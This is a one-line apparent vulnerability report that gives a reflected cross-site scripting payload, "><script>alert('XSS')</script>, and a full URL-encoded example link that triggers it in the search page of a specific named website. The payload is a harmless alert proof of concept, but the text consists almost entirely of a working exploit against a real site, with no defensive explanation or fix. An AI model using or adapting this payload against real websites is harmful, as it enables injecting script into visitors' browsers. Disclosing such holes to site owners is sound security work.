use the searchbox with "><script>alert('XSS')</script> eg url: http://search.gardenweb.com/search/nph-ind.cgi?term=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E